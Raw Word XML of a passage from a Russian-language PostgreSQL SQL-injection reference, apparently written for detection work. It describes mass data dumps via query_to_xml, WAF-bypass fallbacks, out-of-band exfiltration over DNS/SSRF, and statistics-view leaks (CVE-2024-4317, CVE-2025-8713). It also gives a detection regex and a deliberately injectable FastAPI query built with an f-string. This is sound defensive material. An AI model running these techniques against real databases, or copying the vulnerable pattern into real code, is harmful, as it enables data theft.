          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>work_mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-использования (видно в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity.backend_xid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + сравнение с базовой загрузкой) во время инъекции, если payload собрал большой XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002711B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9FEC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без изменений. Семантика стабильна с 8.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52704706" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все три функции доступны на AWS RDS / Google Cloud SQL / Supabase — это часть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, провайдеры их не отключают. Ограничение по объёму — общий лимит на размер HTTP-ответа application (обычно 1-10MB) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (на managed обычно жёстче, чем на self-hosted: 30s типично). Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861A17F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D69B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.x (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это way around подбора колонок. На практике атакующий пробует 3.1 первым (быстрее) и переключается на 3.8.5, если число колонок не подбирается или WAF блокирует.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C7C00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1, 3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT * FROM pg_class ...', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml('pg_proc'::regclass, ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — компактный дамп самих системных каталогов одним вызовом. Иногда удобнее, чем 3.8.1/3.8.2 напрямую.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533DD787" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для парсинга XML внутри SQL. Цепочка: 3.8.5 → 3.11.3 для error-based/boolean-blind использования query_to_xml-результата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682337B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML-результат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> можно отправить через OOB-канал (3.6.1 DNS / 3.6.2 SSRF) с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(query_to_xml(...)::text::bytea, 'hex')</w:t>
      </w:r>
      <w:r>
        <w:t>, если HTTP-ответ невидим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFDBC91"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query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml|table_to_xml|database_to_xml|query_to_xmlschema|table_to_xmlschema|database_to_xmlschema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>risk_score = 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (выше, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что легитимных use case значительно меньше; ниже, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload B). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037DA12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5C4BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: XML Functions — Mapping Tables to XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D49B5EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Source: src/backend/utils/adt/xml.c — реализация query_to_xml / table_to_xml / database_to_xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4CCBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL/XML — ISO/IEC 9075-14:2008 (SQL:2003 Part 14, обзор)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF5CBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL (XML extraction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45554554" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — query_to_xml mass dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735187B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.6 pg_stats и pg_stats_ext — утечка через optimizer statistics (R17, R26)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0A6BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, агрегатов планировщика (most common values, histogram bounds, n_distinct, null_frac). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic_ext_data</w:t>
      </w:r>
      <w:r>
        <w:t>, расширенные статистики (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Сама </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна только superuser-у; views реализуют per-column ACL — фильтруют строки так, чтобы роль видела только статистику для колонок, на которые у неё SELECT. Этот ACL-фильтр исторически имел регрессии:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499751A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-4317 (R17)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — до 14.12 / 15.7 / 16.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не применяет фильтр на колонки, у роли видны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чужих таблиц без SELECT-привилегии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E5B7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2025-8713 (R26)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — до 13.22 / 14.19 / 15.14 / 16.10 / 17.6: custom operator в WHERE-условии, направленный на колонку view/RLS-таблицы, получает сырые значения из underlying-статистики на этапе планировщика — фактически обход view-ACL и RLS через optimizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13787366" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сам по себе утечённый канал — фрагментарный (top-N значений колонки, не полные строки), но для колонок с низкой кардинальностью (статусы, флаги, домены email-ов, типы платежей, и особенно — реально использующиеся пароли в weakly-secured системах) это уже значительная часть содержимого таблицы. Для CVE-2024-4317 критично, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>установка патча на бинаре не закрывает дыру автоматически</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нужно вручную выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в каждой БД, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template0</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEFD13F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B126A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/dashboard.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E2CA5"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5643A25D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB89D54"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74788DA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF66D5"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4878DC82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB04CFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986064A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ABF4D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC992C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/dashboard")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED0853" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def dashboard(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65651BBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    widget: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5F55A"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B0279C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29069957" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D35748B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, title, value FROM widgets WHERE name = '{widget}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C505D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
